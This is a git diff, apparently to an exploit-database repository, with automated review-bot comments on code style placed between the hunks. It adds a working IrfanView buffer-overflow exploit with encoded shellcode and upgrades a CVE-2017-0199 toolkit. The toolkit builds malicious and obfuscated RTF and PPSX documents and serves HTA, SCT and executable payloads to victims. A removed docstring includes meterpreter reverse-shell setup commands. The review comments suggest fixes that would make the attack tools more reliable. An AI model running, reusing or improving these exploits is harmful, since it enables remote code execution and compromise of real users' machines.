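Review bot: `textfile = open(filename , 'w')` at lines 739–741 (and the identical three lines at 821–823 of 44218.py) writes a str holding raw `\x80`–`\xff` escapes in text mode, which yields the intended bytes only under Python 2; with the unversioned `#!/usr/bin/python` shebang on a Python 3 host the output is UTF-8 encoded and silently altered. Pinning the interpreter (`#!/usr/bin/env python2`), or declaring the buffer as `b"..."` and opening with `'wb'`, makes the behaviour explicit, and `with open(filename, 'wb') as textfile:` closes the handle even on error.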
diff --git a/exploits/windows/local/44218.py b/exploits/windows/local/44218.py
new file mode 100755
index 000000000..6943ea8df
--- /dev/null
+++ b/exploits/windows/local/44218.py
@@ -0,0 +1,75 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: IrfanView 4.50 Email PlugIn - Local Buffer Overflow (SEH Unicode)
+# Date: 02-07-2018
+# Vulnerable Software: IrfanView 4.50 Email PlugIn
+# Vendor Homepage: http://www.irfanview.com/
+# Version: 4.50
+# Software Link: http://www.irfanview.info/files/irfanview_450.exe
+# Software Link: http://www.irfanview.info/files/irfanview_plugins_450.zip
+# Tested Windows 7 SP1 x86
+#
+# More reliable result if .NET and updates installed prior to application being installed
+#
+#
+# PoC
+# 1. generate irfan.txt, copy contents to clipboard
+# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
+# 3. select Options, Send by Email, Settings
+# 4. paste contents from clipboard into Full Name and select OK
+# 5. application crashes
+# 6. pop calc
+# ****if calc doesn't pop on first try, repeat steps 2-4 until it does :/
+#
+
+filename="irfan.txt"
+
+#junk to offset
+junk = "\x41"*262
+
+#popad
+nseh = "\x61\x62"
+
+#0x00500102 pop esi pop ebx ret
+#unicode possible ansi transform(s) : 0050008A->00500106,ascii {PAGE_EXECUTE_READ} [i_view32.exe]
+seh = "\x8a\x50"
+
+valign = (
+"\x55" #push ebp
+"\x47" #align
+"\x58" #pop eax
+"\x47" #align
+"\x05\x14\x11" #add eax,400
+"\x47" #align
+"\x2d\x13\x11" #sub eax,300
+"\x47" #align
+"\x50" #push eax
+"\x47" #align
+"\xc3" #retn
+)
+
+#nops to shellcode
+nops = "\x71" * 109
+
+#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
+calc = (
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
+"ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHE2KPKPM0C0U9IU01I02D4K0P004"
+"K0RLLTK0RLT4KT2NHLOH7OZO601KOVLOLQQSLLBNLMPWQHOLMM197K2KBQB0WTK0RN0DKPJOLDK0LLQR"
+"XIS18M1J121TK1IMPKQYC4KPILXJCOJQ9TKOD4KKQ8VP1KOFL91XOLMM1WWP8IPD5ZVLCCMKHOKSMO42"
+"UK428DKPXNDM1ICBFTKLLPKDKB8MLM19CDKLD4KKQHP3YQ4O4MTQKQK1Q291JPQKOIP1OQOPZ4KLRJK4M"
+"1MRJM14MU5WBM0M0M0R0QX014K2OTGKO9EGKL06UFBB6C85VF5GM5MKOJ5OLKVSLKZE0KKIPBUM57KQ7M"
+"CSB2ORJM0PSKOIEBCC1BL1SNN2E2XC5M0AA"
+)
+
+#necessary fill
+fill = "\x71"*1000
+
+buffer = junk + nseh + seh + valign + nops + calc + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/41894.py b/exploits/windows/remote/41894.py
index e8c39719e..121cd8e8d 100755
--- a/exploits/windows/remote/41894.py
+++ b/exploits/windows/remote/41894.py
@@ -1,103 +1,16 @@
+#!/usr/bin/env python
'''
-## Exploit toolkit CVE-2017-0199 - v2.0 (https://github.com/bhdresh/CVE-2017-0199) ##
+ ## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ##
-
-
-Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.
-
-
-### Video tutorial
-
-https://youtu.be/42LjG7bAvpg
-
-
-### Release note:
-
-Introduced following capabilities to the script
-
- - Generate Malicious RTF file using toolkit
- - Run toolkit in an exploitation mode as tiny HTA + Web server
-
-Version: Python version 2.7.13
-
-### Future release:
-
-Working on following feature
-
- - Automatically send generated malicious RTF to victim using email spoofing
-
-### Example:
-
-- Step 1: Generate malicious RTF file using following command and send it to victim
-
- Syntax:
-
- # python cve-2017-0199_toolkit.py -M gen -w -u
-
- Example:
-
- # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
-
-
-- Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler
-
- Example:
-
- Generate Payload:
-
- # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
-
- Start Handler:
-
- # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
-
-
-- Step 3: Start toolkit in exploitation mode to deliver payloads
-
- Syntax:
-
- # python cve-2017-0199_toolkit.py -M exp -e -l
-
- Example:
-
- # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
-
-
-
-### Command line arguments:
-
- # python cve-2017-0199_toolkit.py -h
-
- This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
-
- Modes:
-
- -M gen Generate Malicious RTF file only
-
- Generate malicious RTF file:
-
- -w Name of malicious RTF file (Share this file with victim).
-
- -u The path to an hta file. Normally, this should be a domain or IP where this tool is running.
-
- For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
-
- will be requested once victim will open malicious RTF file.
- -M exp Start exploitation mode
-
- Exploitation:
-
- -p Local port number.
-
- -e The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-
- -l Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
-
-
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41894.zip
'''
+import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile
+from random import randint
+from random import choice
+from string import ascii_uppercase
+from zipfile import ZipFile, ZIP_STORED, ZipInfo
-import os,sys,thread,socket,sys,getopt
BACKLOG = 50 # how many pending connections queue will hold
MAX_DATA_RECV = 999999 # max number of bytes we receive at once
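Review bot: The new import line at 929, `import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile`, lists `sys` twice — already true of the removed line, now carried forward with more names on it; one `import` per module with `sys` once is the PEP 8 form and makes the Python-2-only `thread` dependency easier to spot. The replacement docstring keeps only the title and a download link and drops the usage and mode descriptions; since the `-h` text in the following hunk documents the options, a pointer such as `Run with -h for usage.` would keep the file self-describing. The module's `main()` is outside this hunk.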
@@ -110,35 +23,47 @@ def main(argv):
global docuri
global payloadurl
global payloadlocation
+ global custom
global mode
+ global obfuscate
+ global payloadtype
filename = ''
docuri = ''
payloadurl = ''
payloadlocation = ''
+ custom = ''
port = int("80")
host = ''
mode = ''
+ obfuscate = int("0")
+ payloadtype = 'rtf'
+
# Capture command line arguments
try:
- opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation="])
+ opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:t:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","custom=","obfuscate=","payloadtype="])
except getopt.GetoptError:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
- print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)\n"
+ print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Office RCE)\n"
print "Modes:\n"
- print " -M gen Generate Malicious RTF file only\n"
- print " Generate malicious RTF file:\n"
- print " -w Name of malicious RTF file (Share this file with victim).\n"
- print " -u The path to an hta file. Normally, this should be a domain or IP where this tool is running.\n"
- print " For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and\n"
- print " will be requested once victim will open malicious RTF file.\n"
+ print " -M gen Generate Malicious file only\n"
+ print " Generate malicious payload:\n"
+ print " -w Name of malicious RTF/PPSX file (Share this file with victim).\n"
+ print " -u The path to an HTA/SCT file. Normally, this should be a domain or IP where this tool is running.\n"
+ print " For example, http://attacker.com/test.doc (This URL will be included in malicious file and\n"
+ print " will be requested once victim will open malicious RTF/PPSX file.\n"
+ print " -t RTF|PPSX (default = RTF) Type of the file to be generated.\n"
+ print " -x 0|1 (RTF only) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n"
print " -M exp Start exploitation mode\n"
print " Exploitation:\n"
- print " -p Local port number.\n"
+ print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n"
+ print " -H Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n"
+ print " NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\".\n"
+ print " -p Local port number.\n"
print " -e The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n"
- print " -l Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).\n"
+ print " -l If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.\n"
sys.exit()
elif opt in ("-M","--mode"):
mode = arg
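Review bot: The new `-t` usage line `print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n"` misspells "exploited", and the usage block is the only documentation this tool has, so the typo should go: `print " -t RTF|PPSX (default = RTF) Type of file to be exploited.\n"`. The same option is described twice with different wording (once under gen, once under exp); one description placed above both modes would read better. `obfuscate = int("0")` and the pre-existing `port = int("80")` are just the literals `0` and `80`; converting a string constant adds nothing. main's body continues past the hunk.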
@@ -152,6 +77,12 @@ def main(argv):
payloadurl = arg
elif opt in ("-l", "--payloadlocation"):
payloadlocation = arg
+ elif opt in ("-H","--custom"):
+ custom = arg
+ elif opt in ("-x","--obfuscate"):
+ obfuscate = int(arg)
+ elif opt in ("-t","--payloadtype"):
+ payloadtype = arg
if "gen" in mode:
if (len(filename)<1):
print 'Usage: python '+sys.argv[0]+' -h'
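Review bot: `obfuscate = int(arg)` raises an uncaught ValueError (a traceback instead of the usage line) whenever `-x` is given anything but digits, while every other bad-option path in this function prints the usage message. Since the help text only admits 0 or 1, validate before converting: `if arg not in ('0', '1'):` / `print 'Usage: python '+sys.argv[0]+' -h'; sys.exit(2)` / `obfuscate = int(arg)`. main starts outside the hunk.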
@@ -159,24 +90,63 @@ def main(argv):
if (len(docuri)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
- print "Generating payload"
- generate_exploit_rtf()
+ if (len(payloadtype)<1):
+ print 'Usage: python '+sys.argv[0]+' -h'
+ sys.exit()
+ if payloadtype.upper() == 'RTF':
+ if obfuscate == 1:
+ print "Generating obfuscated RTF file.\n"
+ generate_exploit_obfuscate_rtf()
+ sys.exit()
+ if obfuscate == 0:
+ print "Generating normal RTF payload.\n"
+ generate_exploit_rtf()
+ sys.exit()
+ sys.exit()
+ if payloadtype.upper() == 'PPSX':
+ print "Generating normal PPSX payload.\n"
+ generate_exploit_ppsx()
+ sys.exit()
+ if payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX':
+ print 'Usage: python '+sys.argv[0]+' -h'
+ sys.exit()
mode = 'Finished'
if "exp" in mode:
- if (len(payloadurl)<1):
+ if payloadtype.upper() == 'RTF':
+ if (len(custom)>1):
+ print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect"
+ exploitation_rtf()
+ sys.exit()
+ if (len(payloadurl)<1):
+ print 'Usage: python '+sys.argv[0]+' -h'
+ sys.exit()
+ if (len(payloadurl)>1 and len(payloadlocation)<1):
+ print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect"
+ exploitation_rtf()
+ sys.exit()
+ print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect"
+ exploitation_rtf()
+ mode = 'Finished'
+ if payloadtype.upper() == 'PPSX':
+ if (len(custom)>1):
+ print "Running exploit mode (Deliver Custom SCT) - waiting for victim to connect"
+ exploitation_ppsx()
+ sys.exit()
+ if (len(payloadurl)<1):
+ print 'Usage: python '+sys.argv[0]+' -h'
+ sys.exit()
+ if (len(payloadurl)>1 and len(payloadlocation)<1):
+ print "Running exploit mode (Deliver SCT with remote payload) - waiting for victim to connect"
+ exploitation_ppsx()
+ sys.exit()
+ print "Running exploit mode (Deliver SCT + Local Payload) - waiting for victim to connect"
+ exploitation_ppsx()
+ mode = 'Finished'
+ if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
- if (len(payloadlocation)<1):
- print 'Usage: python '+sys.argv[0]+' -h'
- sys.exit()
- print "Running exploit mode - waiting for victim to connect"
- exploitation()
- mode = 'Finished'
- if not "Finished" in mode:
- print 'Usage: python '+sys.argv[0]+' -h'
- sys.exit()
def generate_exploit_rtf():
- # Preparing malicious Doc
+ # Preparing malicious RTF
s = docuri
docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s)
docuri_pad_len = 224 - len(docuri_hex)
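Review bot: In gen mode with `payloadtype` RTF, an `obfuscate` value other than 0 or 1 falls through both `if obfuscate ==` checks to the bare `sys.exit()` and the program ends with no output at all, unlike the other invalid-argument paths which print the usage line; add `print 'Usage: python '+sys.argv[0]+' -h'` before that `sys.exit()`. The exp-mode RTF and PPSX branches are line-for-line identical except for the function called and the HTA/SCT word in the message, which is a duplication a small dispatch (a dict from upper-cased type to handler and label) would remove. The `len(payloadurl)>1` test is also inconsistent with the `len(payloadurl)<1` test two lines above it; `>0` is what was presumably meant. main starts outside the hunk.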
@@ -221,7 +191,181 @@ def generate_exploit_rtf():
f.close()
print "Generated "+filename+" successfully"
-def exploitation():
+
+
+def generate_exploit_obfuscate_rtf():
+ # Preparing malicious obfuscated RTF
+ var1 = " "
+ var2 = "\r\n"
+ var3 = "\t"
+ var4 = ''.join(choice(ascii_uppercase) for i in range(randint(3,10)))
+ var5 = "{\*\\"+var4+"}"
+ var6 = binascii.b2a_hex(os.urandom(15))
+ #var6 = "0011002e1faa"
+ s = docuri
+ docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s)
+ docuri_pad_len = 224 - len(docuri_hex)
+ docuri_pad = "0"*docuri_pad_len
+ new_docuri_hex = docuri_hex.replace('00', '{\*\\'+var6+'}00')
+ uri_hex = "010000020900000001000000000000000000000000000000a4000000"+"e"+var5*randint(0,10)+"0"+var5*randint(0,10)+"c"+var5*randint(0,10)+"9"+var5*randint(0,10)+"e"+var5*randint(0,10)+"a"+var5*randint(0,10)+"7"+var5*randint(0,10)+"9"+var5*randint(0,10)+"f"+var5*randint(0,10)+"9"+var5*randint(0,10)+"b"+var5*randint(0,10)+"a"+var5*randint(0,10)+"c"+var5*randint(0,10)+"e"+var5*randint(0,10)+"1"+var5*randint(0,10)+"1"+var5*randint(0,10)+"8"+var5*randint(0,10)+"c"+var5*randint(0,10)+"8"+var5*randint(0,10)+"2"+var5*randint(0,10)+"0"+var5*randint(0,10)+"0"+var5*randint(0,10)+"a"+var5*randint(0,10)+"a"+var5*randint(0,10)+"0"+var5*randint(0,10)+"0"+var5*randint(0,10)+"4"+var5*randint(0,10)+"b"+var5*randint(0,10)+"a"+var5*randint(0,10)+"9"+var5*randint(0,10)+"0"+var5*randint(0,10)+"b"+var5*randint(0,10)+"8c000000"+new_docuri_hex+docuri_pad+"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"
+
+ payload = "{\\rtv0"+var1*randint(0,100)+"\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\n"
+ payload += "{\\info\n"
+ payload += "{\\author }\n"
+ payload += "{\\operator }\n"
+ payload += "}\n"
+ payload += "{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\n"
+ payload += "{\n"
+ payload += "{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\n"
+ payload += "{\\*\\objclass \\'57\\'6f\\'72\\'64.Document.8}\n"
+ payload += "{\\*\\objdata 0"+var2*randint(0,10)+var3*randint(0,10)+"1"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"5"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"2"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0\n"
+ payload += "090000004f4c45324c696e6b000000000000000000000a0000\n"
+ payload += "d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\n"
+
+ payload += "6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\n"
+ payload += "000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\n"
+ payload += "0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\n"
+ payload += "00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
+ payload += uri_hex+"\n"
+ payload += "0105000000000000}\n"
+ payload += "{\\result {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\n"
+ payload += "{\\*\\datastore }\n"
+ payload += "}\n"
+ f = open(filename, 'w')
+ f.write(payload)
+ f.close()
+ print "Generated obfuscated "+filename+" successfully"
+
+def generate_exploit_ppsx():
+# Preparing malicious PPSX
+ shutil.copy2('template/template.ppsx', filename)
+ class UpdateableZipFile(ZipFile):
+ """
+ Add delete (via remove_file) and update (via writestr and write methods)
+ To enable update features use UpdateableZipFile with the 'with statement',
+ Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates
+ """
+
+ class DeleteMarker(object):
+ pass
+
+ def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False):
+ # Init base
+ super(UpdateableZipFile, self).__init__(file, mode=mode,
+ compression=compression,
+ allowZip64=allowZip64)
+ # track file to override in zip
+ self._replace = {}
+ # Whether the with statement was called
+ self._allow_updates = False
+
+ def writestr(self, zinfo_or_arcname, bytes, compress_type=None):
+ if isinstance(zinfo_or_arcname, ZipInfo):
+ name = zinfo_or_arcname.filename
+ else:
+ name = zinfo_or_arcname
+ # If the file exits, and needs to be overridden,
+ # mark the entry, and create a temp-file for it
+ # we allow this only if the with statement is used
+ if self._allow_updates and name in self.namelist():
+ temp_file = self._replace[name] = self._replace.get(name,
+ tempfile.TemporaryFile())
+ temp_file.write(bytes)
+ # Otherwise just act normally
+ else:
+ super(UpdateableZipFile, self).writestr(zinfo_or_arcname,
+ bytes, compress_type=compress_type)
+
+ def write(self, filename, arcname=None, compress_type=None):
+ arcname = arcname or filename
+ # If the file exits, and needs to be overridden,
+ # mark the entry, and create a temp-file for it
+ # we allow this only if the with statement is used
+ if self._allow_updates and arcname in self.namelist():
+ temp_file = self._replace[arcname] = self._replace.get(arcname,
+ tempfile.TemporaryFile())
+ with open(filename, "rb") as source:
+ shutil.copyfileobj(source, temp_file)
+ # Otherwise just act normally
+ else:
+ super(UpdateableZipFile, self).write(filename,
+ arcname=arcname, compress_type=compress_type)
+
+ def __enter__(self):
+ # Allow updates
+ self._allow_updates = True
+ return self
+
+ def __exit__(self, exc_type, exc_val, exc_tb):
+ # call base to close zip file, organically
+ try:
+ super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb)
+ if len(self._replace) > 0:
+ self._rebuild_zip()
+ finally:
+ # In case rebuild zip failed,
+ # be sure to still release all the temp files
+ self._close_all_temp_files()
+ self._allow_updates = False
+
+ def _close_all_temp_files(self):
+ for temp_file in self._replace.itervalues():
+ if hasattr(temp_file, 'close'):
+ temp_file.close()
+
+ def remove_file(self, path):
+ self._replace[path] = self.DeleteMarker()
+
+ def _rebuild_zip(self):
+ tempdir = tempfile.mkdtemp()
+ try:
+ temp_zip_path = os.path.join(tempdir, 'new.zip')
+ with ZipFile(self.filename, 'r') as zip_read:
+ # Create new zip with assigned properties
+ with ZipFile(temp_zip_path, 'w', compression=self.compression,
+ allowZip64=self._allowZip64) as zip_write:
+ for item in zip_read.infolist():
+ # Check if the file should be replaced / or deleted
+ replacement = self._replace.get(item.filename, None)
+ # If marked for deletion, do not copy file to new zipfile
+ if isinstance(replacement, self.DeleteMarker):
+ del self._replace[item.filename]
+ continue
+ # If marked for replacement, copy temp_file, instead of old file
+ elif replacement is not None:
+ del self._replace[item.filename]
+ # Write replacement to archive,
+ # and then close it (deleting the temp file)
+ replacement.seek(0)
+ data = replacement.read()
+ replacement.close()
+ else:
+ data = zip_read.read(item.filename)
+ zip_write.writestr(item, data)
+ # Override the archive with the updated one
+ shutil.move(temp_zip_path, self.filename)
+ finally:
+ shutil.rmtree(tempdir)
+
+ with UpdateableZipFile(filename, "a") as o:
+ o.writestr("ppt/slides/_rels/slide1.xml.rels", "\
+ ")
+ print "Generated "+filename+" successfully"
+
+
+def exploitation_rtf():
print "Server Running on ",host,":",port
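Review bot: `generate_exploit_ppsx` defines the roughly hundred-line `UpdateableZipFile` helper (with its nested `DeleteMarker`) inside the function body, so the class is rebuilt on every call, cannot be imported or tested on its own, and makes the function hard to read; hoist it to module level beside the other definitions and leave the function with the copy, the `with` block and the print. The comment `# Preparing malicious PPSX` is at column 0 inside the function body, unlike the indented `# Preparing malicious RTF` in the sibling function. `_close_all_temp_files` relies on `dict.itervalues()`, which is consistent with this file's Python 2 `print` statements but worth a comment since the rest of the helper would otherwise run on Python 3.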
@@ -268,13 +412,30 @@ def server_thread(conn, client_addr):
print "Invalid request from "+client_addr[0]
conn.close()
sys.exit(1)
+ # check if custom HTA flag is set
+ if (len(custom)>1):
+ print "Received request for custom HTA from "+client_addr[0]
+ try:
+ size = os.path.getsize(custom)
+ except OSError:
+ print "Unable to read exe - "+custom
+ conn.close()
+ sys.exit(1)
+ data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n"
+ with open(custom) as fin:
+ data +=fin.read()
+ conn.send(data)
+ conn.close()
+ sys.exit(1)
+ conn.close()
+ sys.exit(1)
check_exe_request = url.find('.exe')
if (check_exe_request > 0):
print "Received request for payload from "+client_addr[0]
try:
size = os.path.getsize(payloadlocation)
except OSError:
- print "Unable to read"+payloadlocation
+ print "Unable to read "+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
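Review bot: The error message on the custom-file branch, `print "Unable to read exe - "+custom`, describes the wrong file: `custom` is the HTA path, and the parallel PPSX handler in this same commit says `"Unable to read custom SCT file - "`. Use `print "Unable to read custom HTA file - "+custom` so the two handlers match. server_thread starts outside the hunk.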
@@ -301,5 +462,96 @@ def server_thread(conn, client_addr):
sys.exit(1)
except socket.error, ex:
print ex
+
+
+def exploitation_ppsx():
+
+ print "Server Running on ",host,":",port
+
+ try:
+ # create a socket
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+ # associate the socket to host and port
+ s.bind((host, port))
+
+ # listenning
+ s.listen(BACKLOG)
+
+ except socket.error, (value, message):
+ if s:
+ s.close()
+ print "Could not open socket:", message
+ sys.exit(1)
+
+ # get the connection from client
+ while 1:
+ conn, client_addr = s.accept()
+
+ # create a thread to handle request
+ thread.start_new_thread(server_thread, (conn, client_addr))
+
+ s.close()
+
+def server_thread(conn, client_addr):
+
+ # get the request from browser
+ try:
+ request = conn.recv(MAX_DATA_RECV)
+ if (len(request) > 0):
+ # parse the first line
+ first_line = request.split('\n')[0]
+
+ # get method
+ method = first_line.split(' ')[0]
+ # get url
+ try:
+ url = first_line.split(' ')[1]
+ except IndexError:
+ print "Invalid request from "+client_addr[0]
+ conn.close()
+ sys.exit(1)
+ # check if custom SCT flag is set
+ if (len(custom)>1):
+ print "Received request for custom SCT from "+client_addr[0]
+ try:
+ size = os.path.getsize(custom)
+ except OSError:
+ print "Unable to read custom SCT file - "+custom
+ conn.close()
+ sys.exit(1)
+ data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n"
+ with open(custom) as fin:
+ data +=fin.read()
+ conn.send(data)
+ conn.close()
+ sys.exit(1)
+ conn.close()
+ sys.exit(1)
+ check_exe_request = url.find('.exe')
+ if (check_exe_request > 0):
+ print "Received request for payload from "+client_addr[0]
+ try:
+ size = os.path.getsize(payloadlocation)
+ except OSError:
+ print "Unable to read"+payloadlocation
+ conn.close()
+ sys.exit(1)
